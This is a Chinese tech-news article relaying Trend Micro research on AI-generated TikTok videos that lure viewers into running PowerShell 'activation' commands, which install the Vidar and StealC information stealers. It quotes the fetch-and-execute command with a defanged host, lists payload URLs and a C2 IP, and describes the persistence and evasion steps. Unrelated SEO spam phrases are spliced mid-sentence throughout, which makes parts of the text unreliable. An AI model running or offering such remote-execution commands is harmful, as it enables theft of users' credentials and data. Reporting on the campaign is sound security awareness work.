数据观澜物联网
快捷导航
您的位置:首页>人工智能>>AI 生成恶意软件:TikTok 视频通过 PowerShell 命令传播信息窃取程序 >

AI 生成恶意软件:TikTok 视频通过 PowerShell 命令传播信息窃取程序

  发布时间:2025-12-07 20:36:45   作者:玩站小弟   我要评论
趋势科技Trend Micro)最新研究揭露,TikTok平台正出现一种新型威胁:AI生成的视频诱骗用户执行恶意PowerShell命令,使其暴露在强大的信息窃取恶意软件风险之下。导致Vidar和St 。

趋势科技(Trend Micro)最新研究揭露,生成视频TikTok平台正出现一种新型威胁:AI生成的恶意视频诱骗用户执行恶意PowerShell命令,使其暴露在强大的软件信息窃取恶意软件风险之下 。

导致Vidar和StealC恶意软件的通过感染链条 | 图片来源:Trend Micro

社交工程攻击新手法

趋势科技近期曝光了一起危险的社交工程攻击活动,黑客利用TikTok的模板下载命令病毒式传播平台分发Vidar和StealC——两种复杂的信息窃取恶意软件家族。网络犯罪分子通过AI生成内容和利用用户信任 ,传播程序将看似无害的信息视频教程转变为恶意软件传播载体 。

报告指出 :"这类攻击使用视频(可能由AI生成)诱导用户执行PowerShell命令 ,生成视频这些命令被伪装成软件激活步骤。恶意"

攻击传播机制

攻击始于@gitallowed 、服务器租用软件@zane.houghton和@sysglow.wow等TikTok账号分享的通过匿名教程视频 ,指导观众激活Windows 、命令Spotify或CapCut等软件 。传播程序部分视频播放量超过50万次,信息展示的生成视频"激活"步骤最终会引导用户执行如下PowerShell命令 :

复制iex (irm hxxps://allaivo[.]me/spotify)1.

趋势科技强调 :"视频指示观众运行一系列命令...指导语音也疑似AI生成,进一步表明攻击者使用AI工具制作这些视频。源码下载"

该命令会下载并执行远程脚本  ,启动一个兼具隐蔽性和持久性的恶意软件投放链。

攻击流程详解用户观看TikTok视频后直接执行PowerShell命令从hxxps://allaivo[.]me/spotify下载并运行远程脚本在APPDATA和LOCALAPPDATA创建隐藏目录 ,并添加到Windows Defender排除列表下载二级有效载荷——通常是从hxxps://amssh[.]co/file.exe获取的Vidar或StealC从hxxps://amssh[.]co/script.ps1获取最终持久化脚本,使恶意软件能在系统重启后继续运行删除日志和临时文件夹以掩盖取证证据

趋势科技警告称 :"脚本采用重试逻辑确保有效载荷成功下载,建站模板然后以隐藏的提升权限进程启动恶意软件可执行文件。"

新型C&C通信技术

恶意软件激活后,会使用新型规避技术与命令控制(C&C)服务器通信:

Vidar利用Steam和Telegram等平台作为Dead Drop Resolvers(DDR ,死投解析器) ,将真实服务器地址隐藏在个人资料元数据中StealC直接连接基于IP的终端(如91[.]92[.]46[.]70)

研究人员指出:"Vidar尤其滥用Steam和Telegram等合法服务作为死投解析器 。"

AI驱动的源码库恶意软件新时代

TikTok算法放大效应与AI生成欺骗手段的结合  ,标志着恶意软件传播进入新时代。正如趋势科技强调 :"AI生成内容的使用,使这类攻击从孤立事件升级为高度可扩展的运营活动 。"

香港云服务器
  • Tag:

相关文章

  • 十款热门的漏洞管理工具及特点分析

    网络安全漏洞管理简单来说就是一个识别、分析、补救或缓解和报告系统与软件安全威胁的过程。漏洞评估需要定期进行,以评估现有的安全状况,以及漏洞管理计划是否需要更改。开展全面且持续的漏洞管理工作,对于企业组
    2025-12-07

  • 电脑修改吃鸡比例教程(快速提升游戏胜率,让你成为吃鸡王者)

    《绝地求生:大逃杀》是一款备受玩家喜爱的网络游戏,而在游戏中,提高自己的吃鸡比例成为很多玩家的目标。通过电脑的一些调整和修改,可以帮助玩家快速提升游戏胜率。本文将为大家介绍如何使用电脑修改来达到这一目
    2025-12-07

  • 探寻语义错误韩剧电脑壁纸高清的魅力(深入解析语义错误韩剧电脑壁纸高清的视觉冲击力)

    在电脑壁纸中,我们经常能看到一些与现实情节不符的语义错误韩剧场景,但其高清画质依然引人入胜。本文将从视觉冲击力的角度,深入探讨这些语义错误韩剧电脑壁纸的魅力。1.炽烈的情感张力:迥异的情感表达方式在一
    2025-12-07

  • animate重置设置的方法教程

    Adobe animate是一款非常好用的软件,其中的功能非常丰富且强大,很多小伙伴都在使用。如果我们希望在Adobe animate中恢复系统默认设置,小伙伴们知道具体该如何进
    2025-12-07

  • 寓教于乐:八款在线网络安全游戏 考验你的网络安全技能

    虽然网络安全通常不直接与娱乐和游戏挂钩,但是学习过程却可以完全娱乐化、游戏化。以下8款在线网络安全游戏,通过安全漏洞和攻击模拟来测试您的网络防御能力。这些选项中既有免费的在线网络安全游戏,也有更为专业
    2025-12-07

  • 用电脑制作盾牌logo,轻松打造独特标识(简明教程)

    在当今社会,标志设计对于企业品牌形象至关重要。一个独特而又有力的标志可以吸引顾客的眼球,同时传达出公司的核心价值观。本文将教你如何利用电脑制作一个精美的盾牌logo,让你的品牌在市场上脱颖而出。1.盾
    2025-12-07

最新评论